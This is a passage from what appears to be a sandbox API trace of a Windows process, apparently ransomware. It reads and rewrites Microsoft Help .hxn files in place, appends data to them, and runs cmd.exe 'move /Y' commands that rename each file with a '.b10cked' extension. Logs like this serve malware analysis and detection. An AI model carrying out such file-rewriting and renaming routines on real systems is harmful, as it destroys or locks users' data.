dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, 
dwProcessId=0xa18, dwThreadId=0xc98)) returned 1 [0197.667] CloseHandle (hObject=0x1b4) returned 1 [0197.667] CloseHandle (hObject=0x120) returned 1 [0197.667] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.667] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.667] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25445698259) returned 1 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 
| out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.669] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.669] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xbd, lpOverlapped=0x0) returned 1 [0197.670] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.670] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xbd, lpOverlapped=0x0) returned 1 [0197.671] SetFilePointer (in: hFile=0x120, lDistanceToMove=-189, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbf [0197.671] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xbd, lpOverlapped=0x0) returned 1 [0197.671] SetFilePointer (in: hFile=0x120, lDistanceToMove=-189, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbf [0197.671] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xbd, lpOverlapped=0x0) returned 1 [0197.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0197.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x132f75c, 
cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATHEDITOR.14.1033.hxn", lpUsedDefaultChar=0x0) returned 29 [0197.675] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17c [0197.675] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.675] CloseHandle (hObject=0x120) returned 1 [0197.676] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN") returned 0x27 [0197.676] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.677] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, 
dwProcessId=0xc5c, dwThreadId=0xcd0)) returned 1 [0197.683] CloseHandle (hObject=0x1b4) returned 1 [0197.683] CloseHandle (hObject=0x120) returned 1 [0197.684] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.684] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.684] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 
| out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25447403512) returned 1 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.686] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.687] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.687] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.688] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.688] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0197.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0197.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0197.692] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.692] CloseHandle (hObject=0x120) returned 1 [0197.802] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN") returned 0x27 [0197.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.803] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, 